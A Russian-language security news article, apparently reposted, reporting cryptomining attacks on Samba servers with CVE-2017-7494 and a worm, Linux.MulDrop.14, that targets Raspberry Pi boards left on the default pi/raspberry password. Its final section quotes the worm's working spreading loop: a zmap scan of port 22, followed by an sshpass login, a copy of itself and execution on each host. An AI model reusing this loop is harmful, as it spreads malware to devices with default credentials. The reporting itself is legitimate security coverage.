Зафиксированы атаки для майнинга криптовалюты на уязвимых серверах Samba и на Raspberry Pi

2 недели ago admin 0

Исследователи лаборатории Касперского зафиксировали активность злоумышленников, связанную с попытками захвата управления над Linux-серверами, на которых не устранена критическая уязвимость (CVE-2017-7494) в Samba, позволяющая выполнить код на сервере. В отличие от похожих целевых атак на Windows-системы с уязвимостью в стеке SMB, атака на Linux-системы сводится к установке не шифровальщика-вымогателя, а ПО для майнинга криптовалют (Trojan-Downloader.Linux.EternalMiner). При успешной атаки на сервере также устанавливается бэкдор для организации удалённого входа (Backdoor.Linux.Agent).

Уязвимость в Samba требует для своей эксплуатации возможности записи в раздел. Как правило разделы Samba экспортируются только для локальной сети, а наличие разделов Samba с доступом на запись, которые можно примонтировать из внешней сети без авторизации, само по себе уже является уязвимостью и встречается чрезвычайно редко. Отмеченная исследователями атака в основном актуальна как второй этап распространения влияния злоумышленников после первичного взлома клиентских систем в корпоративных локальных сетях. Например, первый этап взлома может осуществляться с использованием методов социальной инженерии через отправку троянского ПО сотрудникам по электронной почте. После запуска троянского ПО, осуществляется сканирование доступных в локальной сети серверных систем и поражения тех, что содержат неисправленных уязвимости.

Масштаб атаки пока не известен, удалось узнать только характеристики кошелька, на которые поступают полученные в результате майнинга средства. За месяц на кошелёк поступило 98 XMR (около 5.5 тысяч долларов).

Дополнительно модно отметить волну атак на платы Raspberry Pi, которые подключены к глобальной сети без смены устанавливаемого по умолчанию пароля (логин pi, пароль raspberry). Исследователи из компании Dr.Web выявили вредоносное ПО Linux.MulDrop.14, которое сканирует сетевые устройства с пользователем pi и типовыми паролями, задаваемыми по умолчанию, после чего устанавливает на них ПО ZMap и sshpass, копируют собственные компоненты и меняет пароль для пользователя pi. После активации запускается цикл сканирования устройств при помощи zmap с попытками входа по ssh и запуска своей копии:

 NAME=`mktemp -u 'XXXXXXXX'`   while [ true ]; do   FILE=`mktemp`   zmap -p 22 -o $FILE -n 100000   killall ssh scp   for IP in `cat $FILE`   do     sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &   done   rm -rf $FILE   sleep 10 done  


Source: pirates.in.ua